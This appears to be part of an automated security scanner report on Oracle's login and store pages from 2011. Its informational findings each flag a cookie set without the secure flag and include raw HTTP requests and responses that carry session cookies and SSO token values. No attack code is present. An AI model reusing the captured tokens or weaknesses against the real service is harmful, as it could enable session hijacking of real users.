Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/signon.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Request
POST /mysso/signon.jsp HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000%7E656BF073%7EF67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069...[SNIP]...
Response
HTTP/1.1 200 OKUS1EaweP001nsgSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/ /DTD/xhtml-mobile10.dtd">...[SNIP]...
4.12. https://login.oracle.com/mysso/sso_loginui/b-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-bg.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/b-bg.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuQSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ !.......,..............P.;
4.13. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-l-corner.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuTSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ....................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;
4.14. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-r-corner.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuXSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ....................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;
4.15. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-l-b.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuOSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ....................................................................................!.......,..........E.D.di............N..br29..[..@.4l.4@a...pw..;
4.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-l-t.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntNSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ....................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;
4.17. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-line.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuNSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ..,..............P.;
4.18. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-r-b.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuSSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ....................................................................................!.......,..........C`%.dINfj.j[.n...C..T....d].....N...y..x.!.;
4.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-r-t.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntOSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ....................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;
4.20. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-t-line.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvYSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..,...........D..Y.;
4.21. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/ip-o-logo.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvKSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..........BB.......................................................................................................__.............................................................[SNIP]...
4.22. https://login.oracle.com/mysso/sso_loginui/loginStyling_external.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/loginStyling_external.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:40 GMT; path=/
Request
GET /mysso/sso_loginui/loginStyling_external.css?v=1.0 HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nt7Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:40 GMT; path=/ ...[SNIP]...
4.23. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/moc_lib.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Request
GET /mysso/sso_loginui/moc_lib.js HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nsdSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/ ------------------------//...[SNIP]...
4.24. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/oracle-footer-tagline.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvMSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..."""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ....[SNIP]...
4.25. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/oralogo_small.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntLSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ....//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^....[SNIP]...
4.26. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-l.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntPSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ..............................................ST................XY............................TV............................PQ....................................................[SNIP]...
4.27. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-m-bg.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntSSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ....................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;
4.28. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-r.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntRSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ .........................MO.......MN.......PQ.......ST............................................................................................................................[SNIP]...
4.29. https://login.oracle.com/mysso/sso_loginui/sso_check.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/sso_check.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Request
GET /mysso/sso_loginui/sso_check.js HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nscSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/ .indexOf("Netscape") !=-1);...[SNIP]...
4.30. https://login.oracle.com/mysso/sso_loginui/t-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-bg.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/t-bg.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvPSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..................................................................................................................................................................................[SNIP]...
4.31. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-l-corner.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvRSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..................................................................................................................................................................................[SNIP]...
4.32. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-r-corner.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvSSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..................................................................................................................................................................................[SNIP]...
4.33. https://login.oracle.com/oam/server/sso/auth_cred_submit
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/
Request
POST /oam/server/sso/auth_cred_submit HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000=1464845504205588723&OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S...[SNIP]...
Response
HTTP/1.1 200 OKUS1EaweP001pGiSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/ .submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
4.34. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/pls/orasso/orasso.wwsso_app_admin.ls_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/index.html;q=0.3
Response
HTTP/1.1 200 OKUS1EaweP001nsISet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/ .submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
4.35. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://oraclestore.oracle.com
Path:
/OA_HTML/ibeCAcpSSOLogin.jsp
Issue detail
The following cookies were issued by the application and do not have the secure flag set:GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/ GSI_pses=ZG3E0DB19D7D744455D1A0925C59A3AD3C1FF690A1596002B149367678487AD7773EFC9EF14E0C8F8F29DEECE96E7F0713; expires=Fri, 16-Dec-2011 02:34:05 GMT; path=/OA_HTML BIGipServergsiap_store_http=1510838925.5150.0000; path=/
Request
GET /OA_HTML/ibeCAcpSSOLogin.jsp HTTP/1.1
Response
